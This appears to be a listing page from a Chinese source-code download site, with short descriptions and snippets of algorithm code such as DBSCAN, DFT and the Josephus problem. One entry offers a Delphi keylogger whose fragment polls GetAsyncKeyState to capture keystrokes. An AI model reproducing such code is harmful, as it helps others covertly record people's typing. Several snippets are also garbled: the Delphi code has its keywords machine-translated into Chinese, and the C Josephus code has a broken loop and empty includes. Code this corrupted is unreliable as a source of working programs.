-
DBN应用实例
资源描述制定构建一个2个隐层的神经网络,输入有500维,输出有10维,中间两个隐层到节点数分别为50和20,最后一层使用softmax压缩输出使之具有概率意义。
- 2022-01-25 15:16:54下载
- 积分:1
-
通过 Delphi Keyloger 代码
程序 Send(x: string);
开始
form1。Memo1.Lines.Add(x)
结束 ;
程序 TForm1.Timer1Timer(Sender: TObject);
//begin
//if GetAsyncKeyState(Ord("A")) =-32767 然后 send("A") ;
//if GetAsyncKeyState(Ord("B")) =-32767 然后 send("B") ;
var X,y:integer ;
f:char ;
str:string ;
开始
X: = 0 到 255 做
开始
- 2022-06-29 21:37:30下载
- 积分:1
-
一个求解Josephus问题的函数
#include
#include
#define NULL 0
#include
typedef struct Lnode
{
int data;
struct Lnode *next;
}Josephus;
void CreateList(Josephus*&L,int n)//建立循环链表
{
int i;
Josephus *p,*s;
s=(Josephus*)malloc(sizeof(Josephus));
s->data=1;
L=p=s;
for(i=2;idata=i;
p->next=s;
p=s;
}
p->next=L;
}
void DeleteList(Josephus*&L,Josephus*p,Josephus*q)
{
q->next=p->next;
free(p);
}
void Josephus1(Josephus*&L,int s,int m)
- 2022-01-27 23:12:59下载
- 积分:1
-
数据结构与算法
主要是关于数据结构预算法的书籍,使用c语言编写,我个人认为本书很适合初学者,对我而言收获实在是很大,我很喜欢这本书
- 2022-07-07 22:43:35下载
- 积分:1
-
这个程序可实现最优二分检索树的构造,绘制和检索,请在Turboc 2.0下运行...
这个程序可实现最优二分检索树的构造,绘制和检索,请在Turboc 2.0下运行-this procedure can achieve optimal two-tree structure retrieval, mapping and retrieval, please run Turbo 2.0
- 2022-11-05 10:00:03下载
- 积分:1
-
百钱买百鸡算法设计和分析
应用背景方法一:伪代码输入:n只鸡的个数 输出:公鸡、母鸡和小鸡的个数1、初始化解的个数count=0; 2、循坏变量从x从0~n/5(取整); 2.1循环变量y从0~n/3(取整); 2.1.1 循环变量z从0~n; 2.1.2 如果5*x+3*y+z/3==n && x+y+z==n,则count++;输出x、y、z的值; 2.1.3 y++;
- 2022-03-20 10:38:58下载
- 积分:1
-
DBSCAN算法
% Function: [class,type]=dbscan(x,k,Eps)
% -------------------------------------------------------------------------
% Aim:
% Clustering the data with Density-Based Scan Algorithm with Noise (DBSCAN)
% -------------------------------------------------------------------------
% Input:
% x - data set (m,n); m-objects, n-variables
% k - number of objects in a neighborhood of an object
% (minimal number of objects considered as a cluster)
% Eps - neighborhood radius, if not known avoid this parameter or put []
% -------------------------------------------------------------------------
% Output:
% class - vector specifying assignment of the i-th object to certain
% cluster (m,1)
% type - vector specifying type of the i-th object
% (core: 1, border: 0, outlier: -1)
- 2022-04-08 08:12:27下载
- 积分:1
-
DFT program developed by C, very practical
用C语言实现的离散傅里叶变换(DFT)的经典算法!比较实用!-DFT program developed by C, very practical
- 2022-05-16 00:11:36下载
- 积分:1
-
大数据结构操作
- 2023-05-10 06:30:04下载
- 积分:1
-
解决了矩形板切割矩形材料的问题,采用递归分治的方法
解决了矩形板切割矩形材料的问题,采用递归分治的方法-solve the rectangular plate rectangular cutting materials, using recursive method of administration
- 2022-12-10 09:00:02下载
- 积分:1